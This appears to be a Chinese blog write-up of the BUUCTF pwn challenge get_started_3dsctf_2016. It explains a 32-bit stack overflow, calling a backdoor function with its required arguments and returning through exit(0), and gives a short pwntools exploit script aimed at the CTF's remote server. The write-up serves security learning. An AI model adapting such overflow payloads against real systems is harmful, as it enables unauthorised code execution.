BUUCTF—get_started_3dsctf_2016

先看看开了什么保护机制

打开32位ida看看

挺精炼的一个栈溢出,那就去找找后门函数

点进去看看

发现不简单啊,对参数还有要求,所以我们参数也得调整一下,32位的参数是左边的在前面,那么这样子就没啥问题了
不过有的人会报这样子的错误

这个是因为你非正常退出,以前我们拿到shell,关你怎么样退出,但是现在是cat flag,所以如果你非正常退出,我输出都是没有的,所以一定得找到exit(0)这个函数去正常退出

from pwn import*
p=remote('node4.buuoj.cn',26239)
#p=process('./get')
#gdb.attach(p)
payload=b'a'*0x38+p32(0x080489a0)+p32(0x0804E6A0)+p32(814536271)+p32(425138641)
p.sendline(payload)
p.interactive()
posted @ 2022-10-07 16:35  予柒  阅读(166)  评论(0)    收藏  举报
返回顶端
Live2D /*修改地一:waifu.css*/
/*修改地二:waifu.css*/
/*修改地三:live2d.js*/ /*修改地四:waifu-tips.js*/